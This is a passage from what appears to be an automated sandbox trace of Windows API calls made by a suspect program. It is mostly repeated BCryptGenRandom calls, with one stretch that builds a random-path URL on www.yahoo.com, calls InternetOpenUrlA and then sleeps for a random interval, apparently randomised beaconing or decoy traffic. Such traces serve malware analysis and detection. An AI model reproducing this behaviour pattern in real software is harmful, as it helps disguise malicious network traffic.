hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0203.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0203.317] GetProcessHeap () returned 0x440000 [0203.317] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0203.317] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x11\x7fm½s://www.yahoo.com" | out: lpString1="\x11\x7fm½s://www.yahoo.com") returned="\x11\x7fm½s://www.yahoo.com" [0203.317] lstrcatA (in: lpString1="\x11\x7fm½s://www.yahoo.com", lpString2="/5dpMfij3ccmte89j6qera0q0c/hgupbgCybew6lpZ9izg9dzygtx7OE/w7l1Qwasvaki71qk6fydpe20ahq/qcpdjcm1pPrgiar6r6fqG2tsvEn5bji2PaT8n9bs5v5SB21t/" | out: lpString1="\x11\x7fm½s://www.yahoo.com/5dpMfij3ccmte89j6qera0q0c/hgupbgCybew6lpZ9izg9dzygtx7OE/w7l1Qwasvaki71qk6fydpe20ahq/qcpdjcm1pPrgiar6r6fqG2tsvEn5bji2PaT8n9bs5v5SB21t/") returned="\x11\x7fm½s://www.yahoo.com/5dpMfij3ccmte89j6qera0q0c/hgupbgCybew6lpZ9izg9dzygtx7OE/w7l1Qwasvaki71qk6fydpe20ahq/qcpdjcm1pPrgiar6r6fqG2tsvEn5bji2PaT8n9bs5v5SB21t/" [0203.317] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0203.318] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x11\x7fm½s://www.yahoo.com/5dpMfij3ccmte89j6qera0q0c/hgupbgCybew6lpZ9izg9dzygtx7OE/w7l1Qwasvaki71qk6fydpe20ahq/qcpdjcm1pPrgiar6r6fqG2tsvEn5bji2PaT8n9bs5v5SB21t/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0203.318] GetProcessHeap () returned 0x440000 [0203.318] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0203.318] GetProcessHeap () returned 0x440000 [0203.318] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d6300 | out: hHeap=0x440000) returned 1 [0203.318] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0203.318] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0203.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0203.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0203.319] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0203.319] Sleep (dwMilliseconds=0x1c51d) [0204.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0204.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0204.668] GetProcessHeap () returned 0x440000 [0204.668] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4900 [0204.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0204.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4901, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x4d4901) returned 0x0 [0204.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0204.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0204.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d492e, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d492e) returned 0x0 [0204.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0204.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0204.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0204.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0204.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0204.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0205.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4947, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4d4947) returned 0x0 [0205.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0205.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0205.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0205.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 